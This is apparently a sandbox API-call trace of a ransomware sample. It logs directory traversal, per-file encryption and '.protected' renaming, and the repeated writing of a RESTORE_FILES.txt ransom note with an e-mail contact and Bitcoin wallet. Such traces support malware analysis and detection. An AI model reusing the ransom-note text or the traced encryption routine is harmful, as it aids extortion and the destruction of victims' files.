hTemplateFile=0x0) returned 0xb4 [0066.836] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.836] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.837] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.837] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.839] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.839] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.840] CloseHandle (hObject=0xb4) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="Windows") returned -1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="Program Files") returned -1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="Program Files (x86)") returned -1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="$Recycle.bin") returned 1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="System Volume Information") 
returned -1 [0066.840] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned 47 [0066.840] lstrcmpW (lpString1="Downloader", lpString2=".") returned 1 [0066.840] lstrcmpW (lpString1="Downloader", lpString2="..") returned 1 [0066.840] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*") returned 49 [0066.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.840] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.840] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.840] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.840] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.840] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.841] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\.") returned 49 [0066.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.841] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.841] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.841] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.841] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.841] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.841] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.841] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\..") returned 50 [0066.841] lstrcmpW (lpString1="..", 
lpString2=".") returned 1 [0066.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.841] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="Windows") returned -1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="Program Files") returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="Program Files (x86)") returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="$Recycle.bin") returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="System Volume Information") returned -1 [0066.841] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrIW (lpFirst="qmgr0.dat", lpSrch=".protected") returned 0x0 [0066.841] lstrcmpW (lpString1="qmgr0.dat", lpString2="RESTORE_FILES.txt") returned -1 [0066.841] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.841] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.841] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrW (lpFirst="qmgr0.dat", lpSrch=".txt") returned 0x0 [0066.841] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrW (lpFirst="qmgr0.dat", lpSrch=".rar") returned 0x0 [0066.841] 
lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrW (lpFirst="qmgr0.dat", lpSrch=".zip") returned 0x0 [0066.842] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.846] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.846] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.847] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.847] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0066.848] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0066.848] CloseHandle (hObject=0xd4) returned 1 [0066.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.protected") returned 67 [0066.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.protected" (normalized: 
"c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat.protected")) returned 1 [0066.883] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="Windows") returned -1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="Program Files") returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="Program Files (x86)") returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="$Recycle.bin") returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="System Volume Information") returned -1 [0066.883] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.883] StrStrIW (lpFirst="qmgr1.dat", lpSrch=".protected") returned 0x0 [0066.883] lstrcmpW (lpString1="qmgr1.dat", lpString2="RESTORE_FILES.txt") returned -1 [0066.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.883] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.884] StrStrW (lpFirst="qmgr1.dat", lpSrch=".txt") returned 0x0 [0066.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.884] StrStrW (lpFirst="qmgr1.dat", lpSrch=".rar") returned 0x0 [0066.884] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.884] StrStrW (lpFirst="qmgr1.dat", lpSrch=".zip") returned 0x0 [0066.884] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.888] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.888] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.889] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.889] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0066.891] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0066.891] CloseHandle (hObject=0xd4) returned 1 [0066.892] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.protected") returned 67 [0066.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.protected" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.protected")) 
returned 1 [0066.892] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.892] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.893] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt") returned 65 [0066.893] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.893] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.893] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.894] lstrlenA (lpString="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") returned 684 [0066.894] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.894] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.894] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.894] CloseHandle (hObject=0xb4) returned 1 [0066.894] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.894] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.894] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\RESTORE_FILES.txt") returned 54 [0066.894] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\network\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.894] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.894] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.895] lstrlenA (lpString="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") returned 684 [0066.895] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.895] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.895] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.896] CloseHandle (hObject=0xa4) returned 1 [0066.896] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="Windows") returned -1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files") returned -1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files (x86)") returned -1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="$Recycle.bin") returned 1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="System Volume Information") returned -1 [0066.896] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE") returned 35 [0066.896] lstrcmpW (lpString1="OFFICE", lpString2=".") returned 1 [0066.896] lstrcmpW (lpString1="OFFICE", lpString2="..") returned 1 [0066.896] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*") returned 37 [0066.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.904] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.904] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.904] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\.") returned 37 [0066.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.904] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.904] lstrcmpiW (lpString1="..", lpString2="Windows") 
returned -1 [0066.904] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.904] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.904] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.904] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.904] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\..") returned 38 [0066.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.905] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="Windows") returned -1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="Program Files") returned -1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="Program Files (x86)") returned -1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="$Recycle.bin") returned 1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="System Volume Information") returned -1 [0066.905] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.905] StrStrIW (lpFirst="AssetLibrary.ico", lpSrch=".protected") returned 0x0 [0066.905] lstrcmpW (lpString1="AssetLibrary.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.905] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.905] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.905] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: 
"c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.926] StrStrW (lpFirst="AssetLibrary.ico", lpSrch=".txt") returned 0x0 [0066.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.926] StrStrW (lpFirst="AssetLibrary.ico", lpSrch=".rar") returned 0x0 [0066.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.926] StrStrW (lpFirst="AssetLibrary.ico", lpSrch=".zip") returned 0x0 [0066.926] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x1536, lpOverlapped=0x0) returned 1 [0066.949] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffeaca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.949] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x1536, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x1536, lpOverlapped=0x0) returned 1 [0066.950] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.950] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.950] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 
